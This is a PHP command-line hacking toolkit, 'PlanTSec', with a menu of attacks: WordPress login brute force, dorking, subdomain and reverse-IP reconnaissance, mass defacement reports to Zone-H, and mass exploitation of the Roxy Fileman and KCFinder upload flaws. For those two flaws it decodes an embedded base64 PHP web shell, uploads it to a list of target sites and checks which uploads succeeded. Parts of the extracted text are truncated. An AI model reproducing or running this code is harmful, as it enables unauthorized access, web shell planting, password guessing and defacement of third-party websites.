#!/usr/bin/php foreground_colors['black'] = '0;30'; $this->foreground_colors['dark_gray'] = '1;30'; $this->foreground_colors['blue'] = '0;34'; $this->foreground_colors['light_blue'] = '1;34'; $this->foreground_colors['green'] = '0;32'; $this->foreground_colors['light_green'] = '1;32'; $this->foreground_colors['cyan'] = '0;36'; $this->foreground_colors['light_cyan'] = '1;36'; $this->foreground_colors['red'] = '0;31'; $this->foreground_colors['light_red'] = '1;31'; $this->foreground_colors['purple'] = '0;35'; $this->foreground_colors['light_purple'] = '1;35'; $this->foreground_colors['brown'] = '0;33'; $this->foreground_colors['yellow'] = '1;33'; $this->foreground_colors['light_gray'] = '0;37'; $this->foreground_colors['white'] = '1;37'; $this->background_colors['black'] = '40'; $this->background_colors['red'] = '41'; $this->background_colors['green'] = '42'; $this->background_colors['yellow'] = '43'; $this->background_colors['blue'] = '44'; $this->background_colors['magenta'] = '45'; $this->background_colors['cyan'] = '46'; $this->background_colors['light_gray'] = '47'; } public function getColoredString($string, $foreground_color = null, $background_color = null) { $colored_string = ""; if (isset($this->foreground_colors[$foreground_color])) { $colored_string .= "\033[" . $this->foreground_colors[$foreground_color] . "m"; } if (isset($this->background_colors[$background_color])) { $colored_string .= "\033[" . $this->background_colors[$background_color] . "m"; } $colored_string .= $string . "\033[0m"; return $colored_string; } public function getForegroundColors() { return array_keys($this->foreground_colors); } public function getBackgroundColors() { return array_keys($this->background_colors); } } class PlanTSecLibrary extends Colors { var $ch; function getStr($string, $start, $end) { $str = explode($start, $string); $str = explode($end, $str[1]); return $str[0]; } function homeLah() { echo " __________.__ ____________________ \______ \ | _____ ___\__ ___/ _____/ ____ ____ | ___/ | \__ \ / \| | \_____ \_/ __ \_/ ___\ Author: Con7ext | | | |__/ __ \| | \ | / \ ___/\ \___ Ver : V.1 |____| |____(____ /___| /____| /_______ /\___ >\___ > \/ \/ \/ \/ \/ [1] Wordpress Brute [2] Google Dorker [3] Subdomain Finder [4] Reverse IP [5] Zone-h Poster [6] Alexa Rank [7] CSRF [8] Roxy Fileman [9] Kcfinder [99] Exit Please Choose >> "; $choice = trim(fgets(STDIN)); echo "\n"; if($choice == 1){ system("clear"); echo "[+]Wordpress Brute Force[+]\n\n"; echo "Host: "; $hos = trim(fgets(STDIN)); echo "User: "; $tim = trim(fgets(STDIN)); echo "List: "; $wd = trim(fgets(STDIN)); $load = file_get_contents($wd); $read = explode("\n", $load); foreach($read as $wordlist){ $this->wpBrute($hos, $tim, $wordlist); } $this->backLah(); } else if($choice == 2){ system("clear"); echo "[+] Google Dorking [+]\n\n"; echo "Dork: "; $drk = trim(fgets(STDIN)); $dork = urlencode($drk); $co = $this->makeRequest("https://cse.google.com/cse.js?cx=partner-pub-2698861478625135:3033704849", null, array("User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0")); $cse_tok = $this->getStr($co, '"cse_token": "', '"'); for($i = 1; $i <= 100; $i++){ $au = $this->makeRequest("https://cse.google.com/cse/element/v1?num=10&hl=en&cx=partner-pub-2698861478625135:3033704849&safe=off&cse_tok=$cse_tok&start=$i&q=$dork&callback=x", null, array("User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0")); preg_match_all("@\"unescapedUrl\": \"(.*?)\"@", $au, $ugh); if(preg_match("@\"unescapedUrl\"@", $au)){ foreach($ugh[1] as $url){ echo $url."\n"; } } else{ echo $this->getColoredString("I cant get url :D", "red") . "\n"; break; } } $this->backLah(); } else if($choice == 3){ system("clear"); echo "[+] Subdomain Finder [+]\nPlease just put website without http/https\n\n"; echo "Domain: "; $dom = trim(fgets(STDIN)); $ehh = $this->makeRequest("https://www.virustotal.com/ui/domains/$dom/subdomains", null, array("x-session-hash: 16961ee14a95fae7bbfe69587dcca2adf647b7022e88ec6167edec568e4c69d3")); preg_match_all("@\"id\": \"(.*?)\"@", $ehh, $pew); if(preg_match("@\"id\": \"@", $ehh)){ foreach($pew[1] as $subdo){ echo $subdo."\n"; } } else{ echo $this->getColoredString("Not Found :D", "red") . "\n"; } $this->backLah(); } else if($choice == 4){ system("clear"); echo "[+] Reverse Ip Lookup [+]\nPlease put website without http/https\n\n"; echo "Ip/Domain: "; $web = trim(fgets(STDIN)); $ih = "theinput=$web&thetest=reverseiplookup&name_of_nonce_field=3020dad9e2&_wp_http_referer=%2Freverse-ip-lookup%2F"; $ugh = $this->makeRequest("https://hackertarget.com/reverse-ip-lookup/", $ih, array("User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0")); $eg = $this->getStr($ugh, '
', ''); if(preg_match("@
@", $ugh)){ echo $eg."\n"; } else{ echo $this->getColoredString("Failed to reverse", "red") . "\n"; } } else if($choice == 5){ system("clear"); echo "[+] Zone H Mass Poster [+]\n\n"; echo "Nick: "; $nick = trim(fgets(STDIN)); echo "List: "; $lst = trim(fgets(STDIN)); $read = file_get_contents($lst); $line = explode("\n", $read); echo "Archive: http://www.zone-h.org/archive/notifier=$nick\n"; echo "Onhold : http://www.zone-h.org/archive/notifier=$nick/published=0\n"; foreach($line as $hexel){ $ugh = $this->makeRequest("http://www.zone-h.com/notify/single", "defacer=$nick&domain1=$hexel&hackmode=1&reason=1&submit=Send", array("User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0")); if(preg_match("@color=\"red\">OK<\/font>@", $ugh)){ echo $this->getColoredString("$hexel -> OK", "green") . "\n"; } else{ echo $this->getColoredString("$hexel -> Error", "red") . "\n"; } } $this->backLah(); } else if($choice == 6){ system("clear"); echo "[+] Alexa Mass Check [+]\n\n"; echo "List: "; $list = trim(fgets(STDIN)); $read = file_get_contents($list); $ikem = explode("\n", $read); foreach($ikem as $url){ $ugh = $this->makeRequest("http://data.alexa.com/data?cli=10&dat=snbamz&url=$url", null, array("User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0")); preg_match_all("@backLah(); } else if($choice == 7){ system("clear"); echo "[+] CSRF [+]\nPlease upload file in same folder with this file\n\n"; echo "Web : "; $web = trim(fgets(STDIN)); echo "Post: "; $post = trim(fgets(STDIN)); echo "File: "; $file = trim(fgets(STDIN)); $ugh = $this->makeRequest($web, array("$post" => "@$file"), null); echo $ugh."\n"; $this->backLah(); } else if($choice == 8){ system("clear"); echo "[+] Roxy Fileman Mass [+]\nPlease put complite url with exploit etc : website/php/Upload.php\n\n"; $upload = base64_decode("PD9waHAgaWYoaXNzZXQoJF9GSUxFU1sna29udG9sJ11bJ25hbWUnXSkpeyRuYW1lID0gJF9GSUxFU1sna29udG9sJ11bJ25hbWUnXTskYmFuZ3NhdCA9ICRfRklMRVNbJ2tvbnRvbCddWyd0bXBfbmFtZSddO0Btb3ZlX3VwbG9hZGVkX2ZpbGUoJGJhbmdzYXQsICRuYW1lKTsgZWNobyAkbmFtZTt9ZWxzZXsgZWNobyAiPGZvcm0gbWV0aG9kPXBvc3QgZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhPjxpbnB1dCB0eXBlPWZpbGUgbmFtZT1rb250b2w+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pj4nPiI7DQp9IA0KPz4="); $shell = "kecoak.php.phpgif"; $fopen = fopen($shell, "w"); fwrite($fopen, $upload); fclose($fopen); echo "List: "; $list = trim(fgets(STDIN)); $read = file_get_contents($list); $ughg = explode("\n", $read); foreach($ughg as $url){ $target = $url; $br = str_replace("php/upload.php", "Uploads/", $url); $data = array( "files[]" => "@$shell" ); $ugh = $this->makeRequest($target, $data); if($ugh){ $ngecheck = @file_get_contents("$br/$shell"); if(preg_match("@>>>@", $ngecheck)){ echo $this->getColoredString("$br/$shell Success Upload Shell:D", "green") . "\n"; } else{ echo $this->getColoredString("$br/$shell Failed", "red") . "\n"; } } } $this->backLah(); } else if($choice == 9){ system("clear"); echo "[+] Kcfinder Mass Exploit [+]\nPlease put website with complite exploit :D\n\n"; $upload = base64_decode("PD9waHAgaWYoaXNzZXQoJF9GSUxFU1sna29udG9sJ11bJ25hbWUnXSkpeyRuYW1lID0gJF9GSUxFU1sna29udG9sJ11bJ25hbWUnXTskYmFuZ3NhdCA9ICRfRklMRVNbJ2tvbnRvbCddWyd0bXBfbmFtZSddO0Btb3ZlX3VwbG9hZGVkX2ZpbGUoJGJhbmdzYXQsICRuYW1lKTsgZWNobyAkbmFtZTt9ZWxzZXsgZWNobyAiPGZvcm0gbWV0aG9kPXBvc3QgZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhPjxpbnB1dCB0eXBlPWZpbGUgbmFtZT1rb250b2w+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSc+Pj4nPiI7DQp9IA0KPz4="); $shell = "kecoak.php.phpgif"; $fopen = fopen($shell, "w"); fwrite($fopen, $upload); fclose($fopen); echo "List: "; $list = trim(fgets(STDIN)); $read = file_get_contents($list); $ughg = explode("\n", $read); foreach($ughg as $url){ $target = $url; $br = str_replace("upload.php", "uploads/", $url); $data = array( "Filedata" => "@$shell" ); $ugh = $this->makeRequest($target, $data); if($ugh){ $ngecheck = @file_get_contents("$br/files/$shell"); if(preg_match("@>>>@", $ngecheck)){ echo $this->getColoredString("$br/files/$shell Success Upload Shell:D", "green") . "\n"; } else{ echo $this->getColoredString("$br/files/$shell Failed", "red") . "\n"; } } } $this->backLah(); } else if($choice == 99){ echo "Thanks For using my tools :D"; exit; } else{ echo "Please choose 1 - 9 :| or 99 for exit"; $this->backLah(); } } function backLah() { echo "Back or exit y/n ? "; $choice = trim(fgets(STDIN)); if($choice == "y" or $choice == "Y") { system("clear"); $this->homeLah(); } else if($choice == "n" or $choice == "N") { exit; } else { echo "Please enter y / n :D"; $this->backLah(); } } function makeRequestWP($url, $post = null, $header = null) { $this->ch = curl_init(); curl_setopt($this->ch, CURLOPT_URL, $url); curl_setopt($this->curl, CURLOPT_CONNECTTIMEOUT, 10); if($post && !empty($post)) { curl_setopt($this->ch, CURLOPT_POSTFIELDS, $post); } if($header && !empty($header)) { curl_setopt($this->ch, CURLOPT_HTTPHEADER, $header); } curl_setopt($this->ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($this->ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($this->ch, CURLOPT_SSL_VERIFYPEER, 0); $output = curl_exec($this->ch); $http = curl_getinfo($this->ch, CURLINFO_HTTP_CODE); if($http == 302){ echo $this->getColoredString("Success Try Login", "green") . "\n"; exit; } else{ echo $this->getColoredString("Failed", "red") . "\n"; } curl_close($this->ch); } function makeRequest($url, $post = null, $header = null) { $this->ch = curl_init(); curl_setopt($this->ch, CURLOPT_URL, $url); curl_setopt($this->curl, CURLOPT_CONNECTTIMEOUT, 10); if($post && !empty($post)) { curl_setopt($this->ch, CURLOPT_POSTFIELDS, $post); } if($header && !empty($header)) { curl_setopt($this->ch, CURLOPT_HTTPHEADER, $header); } curl_setopt($this->ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($this->ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($this->ch, CURLOPT_SSL_VERIFYPEER, 0); $output = curl_exec($this->ch); curl_close($this->ch); return($output); } function saveFile($filename, $contents) { $save = fopen($filename, "a"); fwrite($save, $contents."\n"); fclose($save); } function wpBrute($url, $user, $password) { $uurl = $url; if(preg_match("@/wp-login.php@", $url)){ return true; } else{ $url = $url."/wp-login.php"; } echo "Host: $uurl\n"; echo "User: $user\n"; echo "Pass: $password\n"; $this->makeRequestWP($url, "log=$user&pwd=$password&wp-submit=Login&redirect_to=$uurl/wp-admin/", array("User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0")); } } $lib = new PlanTSecLibrary(); $lib->homeLah();